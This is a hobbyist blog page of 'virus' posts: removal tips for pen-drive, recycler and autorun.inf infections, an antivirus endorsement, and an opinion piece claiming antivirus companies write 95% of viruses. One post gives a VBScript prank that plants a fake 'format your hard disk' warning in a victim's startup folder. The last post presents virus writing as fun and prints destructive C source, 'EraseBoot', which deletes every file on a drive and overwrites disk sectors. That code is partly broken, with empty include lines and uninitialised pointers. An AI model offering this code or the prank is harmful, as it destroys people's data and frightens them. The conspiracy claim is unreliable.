Showing posts with label World of virus. Show all posts
Showing posts with label World of virus. Show all posts

Thursday, July 30, 2009

An easy way to delete newfolder.exe virus

1 comments Posted by Deepak at 7:05 PM

I had been bugged by the newfolder.exe virus often.
Here is a simple way to remove it from your pen drive.
Search *.exe in your pendrive.



Arrange icons by modified.
Delete the exe files which have the image of a folder!
Just thought of it, when my pendrive got affected by the virus!

 

Labels:

Sunday, June 21, 2009

An evening with the recycler virus

0 comments Posted by Deepak at 2:50 PM

My laptop had been infected for long by a virus. I had identified it to be the recycler virus couple of weeks ago. But I had never really been trying to remove it. Yesterday evening, the virus had started virtual memory hijacking (ie., loading more memory for other processes). I could not bear it any longer.

So I started to search about the recycler virus. And I have made a small tutorial on the steps to remove the virus.


Goto your drive(in command promt C:\ or D:\)

Type ATTRIB -S -A -H -R.

1. You should be able to see your root drive root drive which is c: or d: etc.

2. Ensure that you are able to see hidden files by going to Tool>Folder Option>view and checking off hidden files.

3. System Volume Information and Recycler should be visible in your root drive (c: d: or whatever drive you use) .

4. Go to your drive and right click on RECYCLER folder and click delete.It was not deleted in my case, since it was being used by some other process. Force del is a useful application to override this error and delete the folder.

5. Right Click on System volume information folder and go to Properties. Go to the tab labeled Security, If your user name is not there then add your username that you use for XP . Give yourself all security rights as well as the SYSTEM user. Then press okay. If you cannot see the security tab and you are using XP professional then go to Tool>Folder Option>View uncheck box "Use simple File sharing" then select Apply.

If you have no clue of what step 5 was, there's a simpler way of doing it.

  1. Click Start, click Run, type cmd, and then click OK.
  2. Make sure that you are in the root folder of the partition for which you want to gain access to the System Volume Information folder. For example, to gain access the C:\System Volume Information folder, make sure that you are in the root folder of drive C (at a "C:\" prompt).
  3. Type the following line, and then press ENTER:
    cacls "driveletter:\System Volume Information" /E /G username:F
    Make sure to type the quotation marks as indicated. This command adds the specified user to the folder with Full Control permissions.
  4. Double-click the System Volume Information folder in the root folder to open it.
  5. If you need to remove the permissions after troubleshooting, type the following line at a command prompt:
    cacls "driveletter:\System Volume Information" /E /R username
    This command removes all permissions for the specified user.

6. Go to the recycle bin the desktop and right click. Choose properties then check the box " Do not move files to the recycle bin. Remove files immediately when deleted." Press Apply.

7. Go to the System Volume Information folder and delete the last folder. These folders are where Xp has taken a snapshot of your system in order to restore it. The virus is hiding here in the event that you restore it is also restored. If you are sure which folder to delete, don't worry. Deleting all the folders in System Volume Information will just delete all the restoration points.

8. You should now open the registry editor and remove the virus from here so that when you restart the virus is not recreated.

9. Open the registry editor. Start >Run> then type regedit in the box and select OK The registry will now open.

10. Hit Ctrl+F Type Recycler (iuhi64 should also be searched) in the search box . Delete the entry when found. Press F3 to find the next occurrance of Recycler(iuhi64) and delete.

11. Close regedit.

12. Go to all installed harddrives and so steps 2- steps 6, steps 8 and steps 9.

13. Run your virus software. You should be able to update any virus software that was previously unupdatable.

14. Restart your computer

15. Verify that that the reycler folder is deleted from you root drive.

16. Then you can uncheck the box in the recycle bin that you checked in step 6. To keep all you deleted files in case you need to restore a file that was accidentally deleted.

My findings:

This virus is recreated using the methods of the recycle bin. Everytime you delete a file it recreates itself because it looks in the recycle bin and restores or copies the virus information inside. If the virus is not able to be stored inside and is immediately removed when you check the box in step 6. Then it cannot recreate itself and all of its power is lost. So erasing it from the registry and drive ensures that it cannot return. It has two copies one in the recyler folder and another one in system volume information. Deleting both the folders does the trick.

http://wiki.answers.com/Q/How_do_you_remove_recycler_virus_found_in_hard_disk
http://www.winmatrix.com/forums/index.php?showtopic=13021
http://support.microsoft.com/kb/309531

These were the three most useful links for me to understand about the recycler virus and delete it.

Spending an evening with the virus ensured that, my laptop was free of recycler virus.

 

Labels: ,

Thursday, August 14, 2008

Open with virus....A Nice article from my friend....

2 comments Posted by Deepak at 7:11 PM

My friend AKS has made his blog active atlast. One post that caught my attention was "Open With Virus !!!"

Have a read....



In some computers, when we double click a drive we get the "open with" dialog box. This is because of an unwanted file residing in the computer. Its name is "autorun.inf". To delete the file and restore the old operation of a drive opeing in the same window do the following steps.

1. Select START --> RUN.

2. enter "cmd" and press enter.

3. Type the drive name in which you ve the problem and click enter.(say if the problem is in C drive enter "C:\")

4. Enter "attrib -s -h - r *.inf".

5. Enter "del *.inf".

Now try opening the drives.I had the problem in my computer. Now i deleted the autorun.inf file and now the problem is solved. Try it!!!

Article link: http://arun-kumaar.blogspot.com/2008/08/open-with-virus.html

 

Labels:

Monday, March 10, 2008

Virus trick using VB Script

0 comments Posted by Deepak at 7:31 PM

Open notepad and type this:
i=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning").Then save it as Virus.VBS and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.


Note:

This does not harm your computer as it does not contain virus.The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this i=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning").And in between make sure your victim does not panic and really reformat his harddisk.

 

Labels:

Tuesday, October 23, 2007

Who makes the virus?

14 comments Posted by Deepak at 9:27 PM

Well this might be a bit shocking for you...But it is true that antivirus companies make 95% of the virus that hit the computers.

You might be wondering....
Why the hell should the anti virus companies make virus???

By writing viruses themselves they can have a ready-made antidote available in seconds, which can be deployed in exchange for cash and the occasional pat on the back.
It might be a controversial suggestion from me...
Keep in mind that this is only my opinion and this does not nessasarily affect the opinion of anyone else . I think that anti virus companies such as Norton and MaCafee are the ones who develop most of the viruses on the market today. If you think about it, it does make sense because in order to make a good product, you need to make something that wears out or needs to be refilled/recharged. The anti virus companies accomplish this by forcing you to pay every couple of months for updated virus definitions one way or another. If nobody is writting any viruses than they are not making any money so in order to keep business going they either pay someone under the counter to develop them or develop them themselves. Hasn't it ever occured to you why the anti virus companies know exactley what to do to remedy the virus?

Actually there are two types of virus's.
1. In the Zoo - Rarely seen out on the net.
2. In the Wild - The ones we are constantly cleaning.
Read a book quite a while ago about virus's quite an intersting book I must say, the AV companies in fact do have progammers who work stricktly with viruses and from what I can remember of the book the companies AV programmers take a new virus out in the wild and pick it apart to see what makes it tick, they put out defintions to cure them, however they also recreate the viruses with several different possible strains and make definitions for these as well. These are called the in the Zoo viruses, they are ones that never touch the internet. The ones typically in the zoo are the more serious ones, they create these themselves so they can make virus defintions and they are usally variants of the more serious viruses we have here, they just make them more problemsome and serious and create definitions for them. The book was really interesting to read and put my mind at ease about the nature of virus's and how AV's companies deal with creating definitions for them.
So from reading this well written book and from research on the net, I think it works both ways, yes they do create viruses however they never reach the net. Which leaves the question open of weather they release them or not just in order to increase sales. I don't think they have the time nor the manpower to do this as there are plenty of people out there creating these nasty buggers without AV companies creating more and releasing them. They have thier own agenda in their own creations and that is to make more defintions advailable to us out there so we may be protected. I wish i can remember the name of the book, i looked for it and can not find it. I been looking for this book for some time now and haven't been able to find it since august.

 

Labels: ,

Monday, October 22, 2007

Kaspersky-My saviour

0 comments Posted by Deepak at 6:23 PM

Having started this blog and posting 13 posts....
I realised today that I have missed out the most used software in my PC.
Today was my semester practical exam.But I was working on this blog instead of studying for my digital exam.Today morning I rushed up with a half an hour study. But since this is my usual habit for all the exams.I was not afraid.I should mention that as I selected a question from the randomly placed sheets I was little tensed.But when I saw the questions i felt the rush of adrenaline.They were easy i knew.The practicals turned out to be as easy as a 20-20 match for india.


As I was connecting the circuit in my exam and when the LED glowed,suddenly my brain lit up.The idea about a post on kaspersky came to my mind.
So here is my post on kaspersky.

Kaspersky is an antivirus software.I regard this as the best antivirus software in the world(wonder why google is not into it???).


According to AV-Comparatives, Kaspersky Anti-Virus (formerly known as AntiViral Toolkit Pro) rates highly amongst virus scanners in terms of detection rates. In 2006 Kaspersky Anti-Virus was ranked second, and was the recipient of the TopTenReviews Gold Award.According to PC World magazine, Kaspersky antivirus software provides the fastest updates for new virus and security threats in the industry.

Regardless,of the all these reviews.According to me they are just blah...blah...nonsense.This antivirus is able to detect every process in the computer.You can't ask for a better software.
And i love the way it detects the virus,as soon as you insert a pendrive with virus.You see the pop up sayin the virus was detected......I just love this antivirus.....

The link for download is http://www.kaspersky.com/

Download and experience the power of kaspersky!!!!!

 

Labels:

Friday, October 19, 2007

VIRUS!!!!!!

0 comments Posted by Deepak at 9:18 AM

Now if you are a regular net user.It is impossible that you don't know what a
virus is!!!!
This post has an interesting virus dealt with it.


A computer virus is just a program.But it enters the computer and modifies the programs in the computer without any consent from the user.Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless until executed.
Which is different form a virus....

The Creeper virus was the first virus detected on ARPANET, the forerunner of the Internet in the early 1970s.

Now history and information apart.....

Let us discuss the art of virus writing.
Virus writing is not a very complicated one.
It is infact very simple.
You have to have a thorough understanding of the system architecture if you want to be a good virus writer.
Though virus writing is illegal.
It can be done for fun....
But dont go beyond the veil.

A simple C Virus

EraseBoot - A Sample Virus Written In C
/*This is a pretty simple virus which I would not advise running on your own machine.*/
#include
#include
#include

main()
{

SearchAndDestroy("");
span("");
boot();

}


span(p)

char *p;
{

struct ffblk f;char n[129];
int r;
SearchAndDestroy(p);
sprintf(n,"%s\\%s",p,"*.*");
for(r=findfirst(n,&f,0x0010);!r;r=findnext(&f))
{
if(*f.ff_name=='.')
continue;
if(f.ff_attrib & 0x0010)
{
sprintf(n,"%s\\%s",p,f.ff_name);
span(n);
}
}
}


SearchAndDestroy(p)

char *p;
{

struct ffblk f;
char b[81];
int r;
strcpy(b,p);
strcat(b,"\\*.*");
for(r=findfirst(b,&f,0x0000);!r;r=findnext(&f))
{
sprintf(b,"%s\\%s",p,f.ff_name);
remove(b);
}
}
boot()
{
char *buff;
char *test;
delay(1000);
fprintf(test,"THIS VIRUS DESTROYS YOUR FILES!!!!!");
abswrite(2,12,0,buff);
}

//Find the header files by yourself(lol..)

 

Labels:

Subscribe to: Posts (Atom)